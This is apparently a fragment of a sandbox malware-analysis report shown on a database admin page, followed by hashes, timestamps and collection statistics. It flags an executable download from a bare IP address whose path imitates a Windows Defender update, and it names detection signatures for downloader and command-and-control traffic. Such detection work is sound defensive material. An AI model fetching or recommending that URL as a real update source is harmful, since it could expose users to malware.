"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_ip_exe",
"description": "Executable is attempted to be downloaded from an IP",
"categories": [
"network",
"downloader"
],
"severity": 5,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"request": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
}
],
"new_data": [],
"alert": false,
"families": []
}
]
|
6
|
[
{
"signature": "stealth_network",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "network_cnc_http",
"ttps": [
"T1071"
],
"mbcs": [
"OB0004",
"B0033",
"OC0006",
"C0002"
]
},
{
"signature": "network_ip_exe",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "network_http",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002"
]
},
{
"signature": "network_questionable_http_path",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "static_pe_pdbpath",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
}
]
|
Suspicious
|
40784dca35fa06d4c4cb932e101e56ab
|
||||||
e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b…
|
e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b…
|
1
|
1777366068.907416
|
true
|
97fbf2451ebb12a44733cfed3a15c211684aa82caeb56d177…
|
||||||||||||||
9a5ff998dbf0f6923d0b454d89800fb4
|
9a5ff998dbf0f6923d0b454d89800fb4
|
280
|
1776926588.3689904
|
true
|
|||||||||||||||
8589cf7187567a34e487cc53ecfe2285
|
8589cf7187567a34e487cc53ecfe2285
|
288
|
1777198759.8967142
|
true
|
|||||||||||||||
be0930fc1d862072effdd01493361fb5
|
be0930fc1d862072effdd01493361fb5
|
1
|
1777214307.421223
|
true
|
|||||||||||||||
c2bf2a9e6beaff5b5321917475545ef4
|
c2bf2a9e6beaff5b5321917475545ef4
|
2
|
1777221353.0536544
|
true
|
|||||||||||||||
74bb3514f737d1386b7ced741ec1e098
|
74bb3514f737d1386b7ced741ec1e098
|
195
|
1777201224.3801856
|
true
|
|||||||||||||||
6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc7…
|
6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc7…
|
2
|
1777365889.5328627
|
true
|
2f963342d9f65f462c3a10407f6533613a385ccee6c1a60de…
|
||||||||||||||
02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd19…
|
02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd19…
|
3
|
1777466809.95765
|
true
|
f1806168ceb8d45c03c860397c0730699b6bb4e9a1a71c6b7…
|
||||||||||||||
2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009…
|
2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009…
|
63
|
1779384319.2373335
|
true
|
ce3b318f6ef22967fbd23b9931920285b20426aaf168d5b7e…
|
| Documents | 18 |
| Total doc size | 194.53 KB |
| Average doc size | 10.81 KB |
| Pre-allocated size | 120 KB |
| Indexes | 1 |
| Total index size | 36 KB |
| Padding factor | |
| Extents |
| Name | Columns | Size | Attributes | Actions |
|---|---|---|---|---|
| _id_ |
_id ASC
|
36 KB | DEL |